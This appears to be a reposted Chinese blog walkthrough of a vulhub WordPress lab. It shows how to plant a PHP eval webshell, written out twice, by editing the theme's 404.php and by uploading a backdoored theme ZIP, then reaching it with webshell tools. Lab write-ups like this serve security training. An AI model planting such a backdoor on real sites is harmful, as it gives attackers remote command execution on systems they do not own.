您的位置:首页 > 娱乐 > 八卦 > vulhub靶场之WordPress

vulhub靶场之WordPress

2024/12/23 11:38:32 来源:https://blog.csdn.net/ineedmoreMuQ/article/details/140885573  浏览:    关键词:vulhub靶场之WordPress

第一步搭建环境

靶场地址,自行去gethub找

安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose

执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

开启docker

docker ps -a查看运行端口

访问进行wordpress设置

第二步 给404.php中写入一句话木马

搭建靶场后台

进行简单的网站后台设置后即可进入如下页面

思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php

在404.php中写入一句话木马,删除其原本文件(可选),并更新文件

<?php phpinfo();eval($_POST['cmd']);?>

访问以下路径可以访问到404.php文件

/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置

对木马使用你的武器库吧,这里小编选择了菜刀

是兄弟就来wordpress砍我!

第三步 这次我们换一个姿势,上传文件来上传木马

        接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件

        下载之后把一个木马文件添加到这个zip压缩包中

        这里小编上传了一个666.php,内容如下

<?php phpinfo();eval($_POST['cmd']);?>

        将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】

        

        压缩文件中的文件名即为主题名

访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php

对他使用你的哥斯拉吧

然而小编还是选择了菜刀,完

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com